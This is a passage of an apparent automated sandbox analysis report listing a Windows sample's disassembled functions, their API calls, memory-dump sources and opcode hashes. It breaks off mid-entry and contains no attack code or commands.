                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 4014797782-2298589950
                                                                                        • Opcode ID: e17eff0aae09f0b9ee98f8f188cdba21d26c2d61ab41049c5a1eb20358f41a5d
                                                                                        • Instruction ID: bd58e9e1e856fc6a2fd4d472f1582a6a587f423f09e402e595e43a8c6dd2dbe8
                                                                                        • Opcode Fuzzy Hash: e17eff0aae09f0b9ee98f8f188cdba21d26c2d61ab41049c5a1eb20358f41a5d
                                                                                        • Instruction Fuzzy Hash: EC217CB5604219AFDB00DF58EC85D6737EDEB4A354B080599FA059B2A1CF70EC11CBB0
                                                                                        Function 00B272D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B27360
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B27370
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B27395
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: bfe0e8ccb13a69fecb914a1a64d4918e117403f100e4c114afb159ab1584984d
                                                                                        • Instruction ID: 31de0ecead59de5b0abf02797635ed1c5aaeab729ba361f921b1b308e5944a5a
                                                                                        • Opcode Fuzzy Hash: bfe0e8ccb13a69fecb914a1a64d4918e117403f100e4c114afb159ab1584984d
                                                                                        • Instruction Fuzzy Hash: EE21D032254128BFDF118F54DC81FBF3BAAEF89750F108164F9089B190CA71AC129BA8
                                                                                        Function 00B27D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B27D97
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B27DAC
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B27DB9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 6dfebb64c4550c8c5e437d13767098bbf90e7f8de3b6b7bb25bb4100451a2bcc
                                                                                        • Instruction ID: d017221e350e5fdc156f1588e73778e9290597bdc21a21e03b04af0742656e83
                                                                                        • Opcode Fuzzy Hash: 6dfebb64c4550c8c5e437d13767098bbf90e7f8de3b6b7bb25bb4100451a2bcc
                                                                                        • Instruction Fuzzy Hash: FC11E772244208BFDF105F64DC45FEB3BE9EF89B54F11462CFA45A60D0DA719811CB24
                                                                                        Function 00B1C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AE027A,?), ref: 00B1C6E7
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B1C6F9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                        • API String ID: 2574300362-1816364905
                                                                                        • Opcode ID: f9fac1f3a90ada8039bf1854414998890233e9cf2e2f1671f243fa0dfa791da4
                                                                                        • Instruction ID: c53f097c7799bf6282313738d55033480ebe95c36f2ccd1be528aa21257267fc
                                                                                        • Opcode Fuzzy Hash: f9fac1f3a90ada8039bf1854414998890233e9cf2e2f1671f243fa0dfa791da4
                                                                                        • Instruction Fuzzy Hash: D0E01279560712CFD7606B29CC59F9A7BD4FF06755BA084AAF885D32A0DBB0DC808F50
                                                                                        Function 00AB4BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AB4AF7,?), ref: 00AB4BB8
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AB4BCA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-1355242751
                                                                                        • Opcode ID: ab9b8bba5df22886e31c5013cd86bac156c009697dea899c82af3993c75bd23e
                                                                                        • Instruction ID: 799ccddcfc8b409880706f49c6ff0d32cb6d0e598780d737deb9d152417469fb
                                                                                        • Opcode Fuzzy Hash: ab9b8bba5df22886e31c5013cd86bac156c009697dea899c82af3993c75bd23e
                                                                                        • Instruction Fuzzy Hash: 0CD0C231520B128FD320AF30DC1874A72D8AF05341F208CA9E481D6562DE70C490C640
                                                                                        Function 00AB4B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AB4B44,?,00AB49D4,?,?,00AB27AF,?,00000001), ref: 00AB4B85
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AB4B97
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-3689287502
                                                                                        • Opcode ID: f37e312ee10b2978656017a6648922d5c13ae9f3f679b443fe63b984d6192c80
                                                                                        • Instruction ID: beb4c6450b9783c5a9601b46be51f3351bd7902fb8bcc06b17371ae84f85db99
                                                                                        • Opcode Fuzzy Hash: f37e312ee10b2978656017a6648922d5c13ae9f3f679b443fe63b984d6192c80
                                                                                        • Instruction Fuzzy Hash: 0DD05B70520752CFD720AF35DC28B4A76D8AF05351F61C86DE4C5E3561DF70D480C650
                                                                                        Function 00B21447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00B21696), ref: 00B21455
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B21467
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        • Opcode ID: 820dc96125b7ed14d31d73c1b9bbf7fdf527222ba9c79ae99cae994b77caaf1d
                                                                                        • Instruction ID: a650e0bbd3970a521f0bb1496c73effc03e7ab6a7709b71449a31c32bf734425
                                                                                        • Opcode Fuzzy Hash: 820dc96125b7ed14d31d73c1b9bbf7fdf527222ba9c79ae99cae994b77caaf1d
                                                                                        • Instruction Fuzzy Hash: 61D01230510B228FD7206F75D80870676D5AF16396F11CCAAA8E9E3660DA74E8C0CA60
                                                                                        Function 00AB55F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00AB5E3D), ref: 00AB55FE
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00AB5610
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                        • API String ID: 2574300362-192647395
                                                                                        • Opcode ID: d5e04f4978d6bf976769a7366ef5455365beadc2c2359f1e10714807013df387
                                                                                        • Instruction ID: 8d295405ee2190b3c5a4eea076a102d51caf90aab990bd66ae400bd3241f1457
                                                                                        • Opcode Fuzzy Hash: d5e04f4978d6bf976769a7366ef5455365beadc2c2359f1e10714807013df387
                                                                                        • Instruction Fuzzy Hash: 26D01274D30B128FD720AF35C82875A77D8AF05355F259869E485D2161DA70C480DA50
                                                                                        Function 00B197CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B193DE,?,00B30980), ref: 00B197D8
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B197EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 2574300362-199464113
                                                                                        • Opcode ID: 964fedb6991a616ca1fe352ec5a35ade9f2a467ce49324135e848e99ec5aa1ad
                                                                                        • Instruction ID: 22a356603fe0c045e5dd08c7ecc1312a9b1a79fc148fd2223f612cf5f7580db7
                                                                                        • Opcode Fuzzy Hash: 964fedb6991a616ca1fe352ec5a35ade9f2a467ce49324135e848e99ec5aa1ad
                                                                                        • Instruction Fuzzy Hash: 76D012705207138FD720AF35D8A875AB6D4EF05391F2188A9E4D5E21A0DF70C8C0C651
                                                                                        Function 00AF7D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c7d9b88bf2c85729a26f78ef695d2bfcaecd2acf08d52dab08df3e74def42635
                                                                                        • Instruction ID: 2fee5960930a3bff69eb6d633146a641d24f6ea532b2b5ae62dda156403b7553
                                                                                        • Opcode Fuzzy Hash: c7d9b88bf2c85729a26f78ef695d2bfcaecd2acf08d52dab08df3e74def42635
                                                                                        • Instruction Fuzzy Hash: F7C14875A0021AEFCB14CF98C884ABEB7B5FF48714B618599F905EB251DB31ED81CB90
                                                                                        Function 00B1E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00B1E7A7
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00B1E7EA
                                                                                          • Part of subcall function 00B1DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B1DEAE
                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B1E9EA
                                                                                        • _memmove.LIBCMT ref: 00B1E9FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 3659485706-0
                                                                                        • Opcode ID: 8ea7ccd43633864413c4fb986f84fe7fbac265188f068a44d742b3e6f0268b91
                                                                                        • Instruction ID: 06c36348192f983b536e2e43b40a761584b95b932d0cf6db1f27ffa480c98983
                                                                                        • Opcode Fuzzy Hash: 8ea7ccd43633864413c4fb986f84fe7fbac265188f068a44d742b3e6f0268b91
                                                                                        • Instruction Fuzzy Hash: 18C16B71A08301DFC714DF28C4909AABBE4FF89714F5489ADF8A99B351D731E985CB82
                                                                                        Function 00B1877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 00B187AD
                                                                                        • CoUninitialize.OLE32 ref: 00B187B8
                                                                                          • Part of subcall function 00B2DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00B18A0E,?,00000000), ref: 00B2DF71
                                                                                        • VariantInit.OLEAUT32(?), ref: 00B187C3
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B18A94
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 780911581-0
                                                                                        • Opcode ID: f325cd780ef93e8845a2edd92b71a8f0b9f02ff015a7f9f8554673598daa890a
                                                                                        • Instruction ID: 98f82a0a6c1b40aef29ad61c8a6b6d3d0c2615ed267892b2a8e6ab1196166953
                                                                                        • Opcode Fuzzy Hash: f325cd780ef93e8845a2edd92b71a8f0b9f02ff015a7f9f8554673598daa890a
                                                                                        • Instruction Fuzzy Hash: 96A14675604B019FD710EF24C581B6AB7E4FF89350F548889F99A9B3A1CB70ED84CB92
                                                                                        Function 00AF814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B33C4C,?), ref: 00AF8308
                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B33C4C,?), ref: 00AF8320
                                                                                        • CLSIDFromProgID.OLE32(?,?,00000000,00B30988,000000FF,?,00000000,00000800,00000000,?,00B33C4C,?), ref: 00AF8345
                                                                                        • _memcmp.LIBCMT ref: 00AF8366
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FromProg$FreeTask_memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 314563124-0
                                                                                        • Opcode ID: f85bf238bdbc18d4f70a62f044072f18ade6189a3cdd1859bf14c2fe28d0ae17
                                                                                        • Instruction ID: eb9b72a2721b542d3a3c9e901476b04b7bf580031954c4a1c1e7704508de52d4
                                                                                        • Opcode Fuzzy Hash: f85bf238bdbc18d4f70a62f044072f18ade6189a3cdd1859bf14c2fe28d0ae17
                                                                                        • Instruction Fuzzy Hash: 32810871A00109EFCB04DFD4C988EEEB7B9FF89715B204598F515AB260DB75AE05CB60
                                                                                        Function 00AF749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                        • String ID:
                                                                                        • API String ID: 2808897238-0
                                                                                        • Opcode ID: 4165765d43a866b868726eca07d78d001439e11c20d32a5a267fe1cef875171c
                                                                                        • Instruction ID: 6d56831719282edbb8893863e976fca5746060d44c174cd5513509069418600f
                                                                                        • Opcode Fuzzy Hash: 4165765d43a866b868726eca07d78d001439e11c20d32a5a267fe1cef875171c
                                                                                        • Instruction Fuzzy Hash: 1451B53060870A9BDB60AFB9D895A3DF3F5AF45350B30981FF696C72E1EB7098408B05
                                                                                        Function 00B1F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00B1F526
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00B1F534
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00B1F5F4
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00B1F603
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2576544623-0
                                                                                        • Opcode ID: 4adcbba6803c22426cf321f4f319585f5ed8630e89a8f5f0b2d35be2182f38bf
                                                                                        • Instruction ID: 976231eba8530a15f60fcff883f06bc23d749ea34baa07b443f11f9c6ad07c68
                                                                                        • Opcode Fuzzy Hash: 4adcbba6803c22426cf321f4f319585f5ed8630e89a8f5f0b2d35be2182f38bf
                                                                                        • Instruction Fuzzy Hash: E8517D71504311AFD310EF24DC96EAFBBE8EF99700F50492DF595972A2EB70A904CB92
                                                                                        Function 00AC492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
